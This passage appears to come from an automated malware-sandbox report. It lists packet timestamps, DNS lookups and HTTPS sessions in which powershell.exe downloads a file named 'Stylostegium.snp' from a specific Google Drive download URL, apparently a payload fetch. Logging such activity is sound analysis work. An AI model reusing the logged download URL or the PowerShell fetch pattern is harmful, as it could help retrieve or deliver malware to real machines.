                        Sep 30, 2024 09:58:23.562916040 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.562952995 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.569330931 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.569418907 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.569468975 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.569515944 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.569523096 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.569530010 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.569557905 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.569562912 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.569610119 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.569616079 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.569653988 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.573208094 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.573267937 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.573286057 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.573295116 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.573313951 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.573355913 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.573451042 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.573492050 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.573507071 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.573517084 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.573539019 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.573575974 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.578609943 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.578668118 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.578689098 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.578700066 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.578722000 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.578730106 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.578768969 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.578774929 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.578816891 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.578918934 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.578969955 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.584537029 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.584613085 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.584619999 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.584662914 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.584669113 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.584697962 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.584712029 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.584721088 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.584748983 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.584789991 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.584917068 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.584968090 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.589922905 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.589982033 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.589993954 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.590003967 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.590023041 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.590032101 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.590065002 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.590070963 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.590109110 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.590332031 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.590384960 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.594867945 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.594928980 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.594935894 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.594945908 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.594979048 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.594980955 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.595015049 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.595026970 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.595066071 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.595103979 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.595443964 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.595506907 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.601540089 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.601593018 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.601618052 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.601623058 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.601655006 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.601675987 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.601691961 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.601721048 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.601726055 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.601773977 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.602111101 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.602169991 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.605317116 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.605365992 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.605386972 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.605395079 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.605417013 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.605424881 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.605452061 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.605458021 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.605494976 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.605531931 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.609580040 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.609654903 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.609738111 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.609796047 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.609802961 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.609810114 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.609846115 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.609882116 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.609885931 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.609934092 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.610054016 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.610109091 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.610234976 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.610300064 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.613913059 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.613970995 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.613982916 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.613990068 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.614015102 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.614020109 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.614059925 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.614065886 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.614095926 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.614142895 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.617710114 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.617782116 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.617788076 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.617840052 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.617846012 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.617886066 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.617897987 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.617906094 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.617937088 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.617973089 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.617975950 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.618022919 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.624988079 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.625058889 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.625066042 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.625113010 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.625215054 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.625264883 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.625272036 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.625277996 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.625322104 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.625361919 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.625365019 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.625416994 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.631119967 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.631187916 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.631194115 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.631247044 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.631252050 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.631283045 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.631304026 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.631310940 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.631325006 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.631333113 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.631376982 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.637027025 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.637092113 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.637094021 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.637105942 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.637140989 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.637176991 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.637181044 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.637228012 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.637609959 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.637664080 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.637671947 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.637726068 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.643841028 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.643899918 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.643909931 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.643919945 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.643949986 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.643955946 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.643987894 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.643992901 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.644021988 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.644062042 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.644345999 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.644403934 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.649676085 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.649730921 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.649750948 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.649760962 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.649779081 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.649785995 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.649816990 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.649821997 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.649856091 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.649895906 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.649966002 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.650021076 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.654017925 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.654077053 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.654097080 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.654102087 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.654136896 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.654151917 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.654162884 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.654184103 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.654189110 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.654231071 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.654237032 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.654280901 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.659491062 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.659574032 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.659652948 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.659701109 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.659718990 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.659732103 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.659744024 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.659763098 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.659790039 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.659796000 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.659830093 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.659863949 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.665220976 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.665298939 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.665318012 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.665327072 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.665347099 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.665355921 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.665385962 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.665391922 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.665427923 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.665462017 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.670567989 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.670624018 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.670649052 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.670650959 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.670664072 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.670670986 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.670716047 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.670722961 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.670767069 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.670948029 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.671127081 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.675981045 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.676055908 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.676064014 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.676117897 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.676124096 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.676151037 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.676167965 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.676176071 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.676201105 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.676265001 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.676269054 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.676314116 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.681205988 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.681261063 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.681273937 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.681287050 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.681298971 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.681312084 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.681348085 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.681354046 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.681385994 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.681421995 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.681499958 CEST51426443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:58:23.681535006 CEST44351426216.58.206.65192.168.2.4
                        Sep 30, 2024 09:58:23.681602001 CEST51426443192.168.2.4216.58.206.65

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Sep 30, 2024 09:57:31.699536085 CEST5388053192.168.2.41.1.1.1
                        Sep 30, 2024 09:57:32.635848999 CEST53538801.1.1.1192.168.2.4
                        Sep 30, 2024 09:57:33.711858988 CEST6365053192.168.2.41.1.1.1
                        Sep 30, 2024 09:57:33.719111919 CEST53636501.1.1.1192.168.2.4
                        Sep 30, 2024 09:58:11.598086119 CEST5354832162.159.36.2192.168.2.4
                        Sep 30, 2024 09:58:12.110691071 CEST53631761.1.1.1192.168.2.4

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Sep 30, 2024 09:57:31.699536085 CEST192.168.2.41.1.1.10xdf99Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                        Sep 30, 2024 09:57:33.711858988 CEST192.168.2.41.1.1.10x62deStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Sep 30, 2024 09:57:32.635848999 CEST1.1.1.1192.168.2.40xdf99No error (0)drive.google.com142.250.185.142A (IP address)IN (0x0001)false
                        Sep 30, 2024 09:57:33.719111919 CEST1.1.1.1192.168.2.40x62deNo error (0)drive.usercontent.google.com216.58.206.65A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • drive.google.com
                        • drive.usercontent.google.com

                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.449730142.250.185.1424433020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        2024-09-30 07:57:33 UTC215OUTGET /uc?export=download&id=12lzUxLYysnAHg12uOMXb7uEyOaJCANHH HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: drive.google.com
                        Connection: Keep-Alive
                        2024-09-30 07:57:33 UTC1610INHTTP/1.1 303 See Other
                        Content-Type: application/binary
                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                        Pragma: no-cache
                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                        Date: Mon, 30 Sep 2024 07:57:33 GMT
                        Location: https://drive.usercontent.google.com/download?id=12lzUxLYysnAHg12uOMXb7uEyOaJCANHH&export=download
                        Strict-Transport-Security: max-age=31536000
                        Cross-Origin-Opener-Policy: same-origin
                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                        Content-Security-Policy: script-src 'nonce-M9BT7m3xPvVHNLuS0MXazg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                        Server: ESF
                        Content-Length: 0
                        X-XSS-Protection: 0
                        X-Frame-Options: SAMEORIGIN
                        X-Content-Type-Options: nosniff
                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        Connection: close


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.449731142.250.185.1424433020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        2024-09-30 07:57:38 UTC97OUTGET /uc?export=download&id=12lzUxLYysnAHg12uOMXb7uEyOaJCANHH HTTP/1.1
                        Host: drive.google.com
                        2024-09-30 07:57:38 UTC1319INHTTP/1.1 303 See Other
                        Content-Type: application/binary
                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                        Pragma: no-cache
                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                        Date: Mon, 30 Sep 2024 07:57:38 GMT
                        Location: https://drive.usercontent.google.com/download?id=12lzUxLYysnAHg12uOMXb7uEyOaJCANHH&export=download
                        Strict-Transport-Security: max-age=31536000
                        Cross-Origin-Opener-Policy: same-origin
                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                        Content-Security-Policy: script-src 'report-sample' 'nonce-1PM1GBgdP4ldxhQoYO85sw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                        Server: ESF
                        Content-Length: 0
                        X-XSS-Protection: 0
                        X-Frame-Options: SAMEORIGIN
                        X-Content-Type-Options: nosniff
                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        Connection: close


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.449732216.58.206.654433020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        2024-09-30 07:57:39 UTC139OUTGET /download?id=12lzUxLYysnAHg12uOMXb7uEyOaJCANHH&export=download HTTP/1.1
                        Host: drive.usercontent.google.com
                        Connection: Keep-Alive
                        2024-09-30 07:57:41 UTC4856INHTTP/1.1 200 OK
                        Content-Type: application/octet-stream
                        Content-Security-Policy: sandbox
                        Content-Security-Policy: default-src 'none'
                        Content-Security-Policy: frame-ancestors 'none'
                        X-Content-Security-Policy: sandbox
                        Cross-Origin-Opener-Policy: same-origin
                        Cross-Origin-Embedder-Policy: require-corp
                        Cross-Origin-Resource-Policy: same-site
                        X-Content-Type-Options: nosniff
                        Content-Disposition: attachment; filename="Stylostegium.snp"
                        Access-Control-Allow-Origin: *
                        Access-Control-Allow-Credentials: false
